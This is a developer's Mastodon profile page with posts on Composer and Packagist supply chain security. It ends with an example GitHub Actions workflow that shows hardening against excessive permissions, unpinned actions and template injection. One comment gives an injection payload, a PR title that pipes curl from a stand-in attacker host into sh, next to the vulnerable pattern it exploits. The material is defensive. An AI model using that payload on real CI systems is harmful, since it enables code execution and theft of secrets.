Jordi Boggiano

@seldaek
1.3K Followers
106 Following
70 Posts
Co-Founder of @packagist – Dev at teamup.com – #ComposerPHP lead – Wandering Belgian
Website: https://seld.be
GitHub: https://github.com/Seldaek
๐Ÿ›ก๏ธ Blog: How Composer's download fallback behavior can silently override security decisions at the repository side, and what we are doing about it.
If Private Packagist refuses to serve a malware-flagged version, Composer can fall back to the original GitHub URL, or even clone from source. Two new Private Packagist options close both fallback paths, regardless of the Composer version your developers and CI happen to be running.
https://blog.packagist.com/closing-composers-download-fallback-paths-in-private-packagist/
#php #phpc #composerphp
Closing Composer's Download Fallback Paths in Private Packagist

This is the next post in our supply chain security series, following the supply chain security update and the Composer 2.10 release. Each post in this series covers a specific Composer behavior worth understanding, and a Private Packagist feature we are introducing on top of it. Today: How Composer's

Private Packagist

RE: https://phpc.social/@packagist/116607210878071413

I realized I was never going to get to adding zizmor to all my repos, so I made a Claude skill to let it do the grunt work.

You can use it too, if it helps more busy/lazy people to secure their GitHub repos I am glad!

See https://github.com/Seldaek/zizmorify

📦 Composer 2.10 is out today.

Native malware filtering, powered by an Aikido feed and enabled by default for everyone installing from Packagist. The new unified config.policy framework consolidates handling of malware, security advisories, and abandoned packages, and also lets organizations plug in their own custom policies.
Source fallback is now deprecated, and there's wildcard support in composer update --with.

https://blog.packagist.com/composer-2-10-release/

#php #phpc #composerphp

Composer 2.10 Release

We are excited to announce the release of Composer 2.10.0, introducing native malware filtering and consolidated future-proof customizable dependency policy configuration to control the handling of security advisories, abandoned packages, and now malware. Fast detection of malware for packages published on Packagist.org is provided by Aikido. This

Private Packagist

🔒 An update on Composer & Packagist supply chain security:

Covering what's in place today, what ships this week with Composer 2.10 (dependency policies, stable version immutability), what's coming next (mandatory MFA, minimum-release-age policy, organizational package ownership), and the long-term direction toward immutable artifacts with SLSA provenance and sigstore attestations.

If you maintain PHP packages, please enable MFA now.

https://blog.packagist.com/an-update-on-composer-packagist-supply-chain-security/
#php #phpc #composerphp

An Update on Composer & Packagist Supply Chain Security

The last months, and even more so the last weeks, saw an increasing amount of software supply chain attacks targeting open-source ecosystems. A handful of these have hit the PHP ecosystem too, via taken-over GitHub accounts and stolen access tokens that let attackers publish new tags on packages they had

Private Packagist
We recommend you change the default permissions for GitHub Actions GITHUB_TOKENs to read only. Explicitly grant elevated permissions only where strictly necessary. Use zizmor to analyze your GitHub Actions: https://github.com/zizmorcore/zizmor see also @sebastian on zizmor: https://phpunit.expert/articles/hardening-github-actions-workflows.html
It took us a bit longer than expected but after over a month of discussions and rewrites, Composer 2.10 RC2 is now available for testing with a new policy config and detected malware now blocked by default on install. https://github.com/composer/composer/releases/tag/2.10.0-RC2 #composerphp #phpc
Release 2.10.0-RC2 · composer/composer

Composer 2.10 is ready for a release, and we need your help to test it and report any regression. Please try it out! Running composer self-update --preview will get you the 2.10.0-RC2 Running comp...

GitHub

RE: https://phpc.social/@packagist/116566852406125489

If you haven't updated Composer to 2.9.8 or 2.2.28 (LTS), do so urgently! GitHub will restart the rollout of their new GitHub Actions tokens later today. They've improved secret masking to cover this Composer issue, but you're safer if you update. #composerphp #php #phpc

Three months of Private Packagist updates: Malware filter list support is already in place, ahead of Composer 2.10's release next week. Flagged versions show warning banners on package pages and are marked in the version list. Permissions views on package level, better background job & sync visibility, and a narrower GitLab OAuth scope (read_api).

https://blog.packagist.com/whats-new-in-private-packagist-may-2026-update/

#php #phpc #composerphp

What's New in Private Packagist, May 2026 Update

Over the past three months, we've shipped updates focused on security, integrations with code hosting platforms, and usability improvements throughout Private Packagist. Here's a rundown of the most notable changes. Support for Malware Filter Lists We've added support for malware filter lists to help protect your projects from compromised dependencies.

Private Packagist
Spring has come and this year's trend for my new fellow cyclists seems to be riding with airpods in their ears. Even saw a pro who combined it with looking at his phone riding hands free 🙈

Your CI workflows run with secrets, network access, and write permission to your repo. They are code, and they deserve the same scrutiny as your other code.

@seldaek pointed me at zizmor, which found 52 weaknesses in PHPUnit's workflows. I fixed them all and wrote about each class:

https://phpunit.expert/articles/hardening-github-actions-workflows.html?ref=mastodon

Hardening GitHub Actions workflows

A walk through the GitHub Actions weaknesses in PHPUnit's workflows, how each one could have been exploited, and what was changed to close them.

phpunit.expert
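The two GitHub Actions posts above (Private Packagist's advice to make the GITHUB_TOKEN read-only by default and grant more only where needed, and the PHPUnit workflow hardening that zizmor drove) both boil down to a few workflow-file patterns. The workflow below is an added example written for this page; it is not from either post, from Private Packagist, from PHPUnit, or from zizmor's documentation. The file name, job names, the PHP setup action and the release step are assumptions, and `<full-commit-sha>` is a placeholder for the 40-character commit hash you would pin after reviewing the action's release.

```yaml
# .github/workflows/ci.yml (hypothetical example; file, job and step names are assumptions)
name: CI

on:
  pull_request:
  push:
    tags: ['v*']

# Weak setting this replaces: no top-level `permissions:` key at all, so every
# job inherits the repository default, which on older repositories is a
# read/write GITHUB_TOKEN. Start read-only here and grant upward per job.
permissions:
  contents: read

jobs:
  test:
    runs-on: ubuntu-latest
    # No job-level `permissions:` block, so this job keeps contents: read only.
    steps:
      # zizmor's unpinned-uses audit flags mutable tags such as @v4; pin the
      # full commit SHA and keep the tag as a comment for humans.
      - uses: actions/checkout@<full-commit-sha> # v4
      - uses: shivammathur/setup-php@<full-commit-sha> # v2
        with:
          php-version: '8.3'
      - run: composer install --no-interaction --prefer-dist
      - run: vendor/bin/phpunit

      # Weak pattern (zizmor's template-injection audit): the expression is
      # expanded into the shell script before it runs, so a PR title such as
      #   "; curl https://attacker.example/x | sh; #
      # executes on the runner. The vulnerable form looked like this:
      #   - run: echo "PR title is ${{ github.event.pull_request.title }}"
      # Hardened form: route untrusted input through an environment variable
      # and let the shell quote it, so the title is data, not code.
      - name: Log PR title
        if: github.event_name == 'pull_request'
        env:
          PR_TITLE: ${{ github.event.pull_request.title }}
        run: printf 'PR title is %s\n' "$PR_TITLE"

  release:
    if: startsWith(github.ref, 'refs/tags/v')
    needs: test
    runs-on: ubuntu-latest
    # The only job that needs to write, and only to create a release; a
    # compromised test step above still cannot push or tag with its token.
    permissions:
      contents: write
    steps:
      - uses: actions/checkout@<full-commit-sha> # v4
      - run: gh release create "$GITHUB_REF_NAME" --generate-notes
        env:
          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
```

Running `zizmor .github/workflows/` over the repository reports the three classes shown here (excessive permissions, unpinned action references, template injection) before and confirms they are gone after; the same audits are what the linked PHPUnit article works through, so this file is the shape a passing workflow ends up in.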